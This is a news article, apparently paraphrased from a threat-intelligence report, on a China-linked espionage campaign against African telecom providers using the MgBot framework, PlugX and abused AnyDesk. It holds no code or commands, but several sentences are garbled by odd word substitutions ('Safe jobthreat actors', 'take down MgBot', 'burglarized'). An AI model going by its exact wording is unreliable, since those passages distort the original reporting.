Telecommunications service providers in Africa are being targeted by a new campaign orchestrated by threat actors linked to China since at least November 2022.
The intrusion has been pinned on a hacking crew tracked by Symantec as Daggerflyand which are also being tracked by the wider cybersecurity community such as Bronze Highland and Evasive Panda.
The campaign uses “a previously unseen plug-in from the MgBot malware framework”, the cybersecurity firm said in a report shared with The Hacker News. “The attackers were also seen using the plugX loader and abusing the legitimate AnyDesk remote desktop software.”
Based on Safe jobthreat actors used spear-phishing as the initial infection vector to take down MgBot as well as other tools such as Cobalt Strike and an Android remote access trojan (RAT) called KsRemote.
The group is suspected of carrying out espionage activities against domestic human rights and pro-democracy supporters and China’s neighbors since 2014.
Attack chains analyzed by Symantec show usage living-off-the-land (LotL) tool. like BITSAdmin And PowerShell to deliver the payload of the next stage, including a valid AnyDesk executable and a credential harvesting utility.
The threat actor then moves to set persistence on the victim’s system by creating a local account and deploying the MgBot modular framework, which comes with various plug-ins for capturing browser data, logging keystrokes, capturing screenshots, recording audio, and computing. Active Directory Services.
“All of these capabilities allow an attacker to collect large amounts of information from the victim’s machine,” said Symantec. “The capabilities of this plug-in also demonstrate that the main goal of attackers during this campaign is to gather information.”
The all-encompassing nature of MgBot suggests that it is actively maintained and updated by operators to gain access to the victim’s environment.
The disclosure comes barely a month after SentinelOne detailed a campaign called Tainted Love in Q1 2023 aimed at telecom providers in the Middle East. It is associated with a Chinese cyberespionage group that shares an overlap with Gallium (aka Othorene).
Symantec further said it identified three additional victims from the same activity group located in Asia and Africa. The two victims who were burglarized in November 2022 are subsidiaries of a telecommunication company in the Middle East region.
“Telecommunication companies will always be prime targets in intelligence gathering campaigns because of the access they can provide to end-user communications,” said Symantec.